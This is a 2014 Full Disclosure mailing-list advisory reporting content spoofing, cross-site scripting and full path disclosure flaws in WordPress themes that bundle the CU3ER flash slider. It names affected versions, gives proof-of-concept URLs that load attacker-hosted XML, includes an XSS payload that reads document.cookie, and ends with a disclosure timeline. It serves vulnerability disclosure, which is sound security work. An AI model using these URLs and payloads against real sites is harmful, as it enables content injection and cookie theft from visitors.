'[FD] CS, XSS and FPD vulnerabilities in multiple themes with CU3ER for'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] CS, XSS and FPD vulnerabilities in multiple themes with CU3ER for
From:       "MustLive" <mustlive () websecurity ! com ! ua>
Date:       2014-04-25 19:02:37
Message-ID: 004401cf60b8$fdfbf2b0$9b7a6fd5 () pc
[Download RAW message or body]

Hello list!

Recently I disclosed vulnerabilities in CU3ER 
(http://seclists.org/fulldisclosure/2014/Apr/244) and vulnerabilities in 
plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone 
(http://seclists.org/fulldisclosure/2014/Apr/251). This is popular flash 
file and in Google's index there are up to million web sites with it 
(inurl:cu3er.swf filetype:swf - now Google shows 994000 results).

These are Content Spoofing, Cross-Site Scripting and Full path disclosure 
vulnerabilities in themes with CU3ER for WordPress. CU3ER is used in the 
next plugins for WordPress: ShapeShifter, Los Angeles, Themebox, Elite 
Force, Webfolio and other themes, including custom themes. And premium 
themes like ShapeShifter, Themebox, Elite Force.

-------------------------
Affected products:
-------------------------

Vulnerable are all themes with flash file of CU3ER.

Vulnerable are ShapeShifter 1.x ł 2.x and previous versions.

Vulnerable are Vulnerable are all versions of Los Angeles.

Vulnerable are Themebox 1.1 and previous versions.

Vulnerable are Elite Force 2.1.0 and previous versions.

Vulnerable are Webfolio 2.0.2 and previous versions.

----------
Details:
----------

Content Spoofing (Content Injection) (WASC-12):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml

Directory also can be named themebox10 and themebox11.

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml

Directory also can be named themebox10 and themebox11.

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

For cross-domain attacks it's needed to have crossdomain.xml at web site 
with xml-files.

Full path disclosure (WASC-13):

FPD in php-files of the theme (by default) or in error_log. In index.php and 
other php-files.

http://site/wp-content/themes/shapeshifter/

http://site/wp-content/themes/shapeshifter2/

http://site/wp-content/themes/los_angeles/

http://site/wp-content/themes/themebox/

http://site/wp-content/themes/themebox10/

http://site/wp-content/themes/themebox11/

http://site/wp-content/themes/elite_force/

http://site/wp-content/themes/webfolio/

------------
Timeline:
------------ 

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers 
of the plugins and themes.
2014.04.18 - disclosed at my site about plugins for different CMS.
2014.04.22 - disclosed at my site about themes for WP 
(http://websecurity.com.ua/7125/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 